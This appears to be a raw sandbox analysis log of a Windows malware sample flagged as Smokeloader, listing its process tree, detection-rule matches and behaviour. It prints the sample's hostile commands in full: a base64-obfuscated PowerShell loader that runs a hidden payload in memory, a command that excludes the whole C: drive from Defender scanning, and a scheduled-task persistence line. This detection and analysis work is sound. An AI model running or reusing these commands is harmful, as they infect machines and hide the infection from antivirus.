Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: kernel.appcore.dll
Source: xwREqjHUEv.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 00000016.00000002.2788977995.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000013.00000002.2538928588.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000013.00000002.2538295136.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000016.00000002.2790746450.0000000001EB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2964, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5720, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 6.2.powershell.exe.8770000.2.raw.unpack, suSFEPEfDHGCWwn.cs Base64 encoded string: 'RmFsc2V8RmFsc2V8VHJ1ZXxGYWxzZXxGYWxzZXxGYWxzZXxjdnRyZXN8VW5kTGRsfGV4ZXwyMDAwfFJlZ0FzbS5leGV8djR8cnVuUEU='
Source: 13.3.OpenWith.exe.24aba862410.5.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.8.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.18.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.13.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.3.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.4.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.17.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 13.3.OpenWith.exe.24aba862410.19.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: powershell.exe, 00000006.00000002.2117709095.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: pRi+QCH[j]N|[RJ/T#*us/x`yq/oTuI`SOI_tU+q@s/n#`J_Our5n.slN5jxqxiNLNBvhVp(tp]ij.@\Lxko5*/k
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@61/35@1/2
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403532
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004049C7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7102262C CreateToolhelp32Snapshot,Thread32First,Thread32Next,FindCloseChangeNotification,SuspendThread, 14_2_000001FF7102262C
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_004021AF CoCreateInstance, 0_2_004021AF
Source: C:\Users\user\Desktop\xwREqjHUEv.exe File created: C:\Users\user\start.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
Source: C:\Windows\SysWOW64\dialer.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2788:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Mutant created: \Sessions\1\BaseNamedObjects\ab10c56eed80d1785b81ee2fcb4bec96
Source: C:\Users\user\Desktop\xwREqjHUEv.exe File created: C:\Users\user\AppData\Local\Temp\nsxD243.tmp
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Process created: C:\Windows\SysWOW64\wscript.exe "wscript.exe" "C:\Users\user\start.vbs"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: xwREqjHUEv.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\xwREqjHUEv.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: xwREqjHUEv.exe Virustotal: Detection: 23%
Source: F324.exe String found in binary or memory: {df9dc55e-7bf4-fce3-add0-fbbcbfc59bae}
Source: F324.exe String found in binary or memory: {870df8a6-6146-5dd5-addd-378b91fba06e}
Source: F324.exe String found in binary or memory: {4bae1f03-0bb4-adda-209a-54576cafa701}
Source: F324.exe String found in binary or memory: {384f6227-adde-34e6-e81f-682714c23988}
Source: F324.exe String found in binary or memory: {e0ebe2ca-8e55-2be3-2544-addea6f5d835}
Source: F324.exe String found in binary or memory: {0cfe5fb2-a3aa-add2-9c38-b846543ad633}
Source: F324.exe String found in binary or memory: {3fc95bca-0034-19c0-addc-40ff5a489a31}
Source: F324.exe String found in binary or memory: {b57dac90-5278-b5a3-addf-eb50dfea59be}
Source: F324.exe String found in binary or memory: {5b8d1595-add5-40ea-0007-33822a8d20d1}
Source: F324.exe String found in binary or memory: {21e9d188-9d35-9a3a-addc-1b641930a318}
Source: C:\Users\user\Desktop\xwREqjHUEv.exe File read: C:\Users\user\Desktop\xwREqjHUEv.exe
Source: C:\Users\user\AppData\Local\Temp\F324.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\xwREqjHUEv.exe "C:\Users\user\Desktop\xwREqjHUEv.exe"
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Process created: C:\Windows\SysWOW64\wscript.exe "wscript.exe" "C:\Users\user\start.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwy
MjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 720
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Roaming\D4C0.vmt.exe "C:\Users\user\AppData\Roaming\D4C0.vmt.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\gfiecjd C:\Users\user\AppData\Roaming\gfiecjd
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F324.exe C:\Users\user\AppData\Local\Temp\F324.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F557.exe C:\Users\user\AppData\Local\Temp\F557.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process created: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe"
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Process created: C:\Windows\SysWOW64\wscript.exe "wscript.exe" "C:\Users\user\start.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Roaming\D4C0.vmt.exe "C:\Users\user\AppData\Roaming\D4C0.vmt.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F324.exe C:\Users\user\AppData\Local\Temp\F324.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F557.exe C:\Users\user\AppData\Local\Temp\F557.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\F324.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process created: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe"
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe" /F
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook
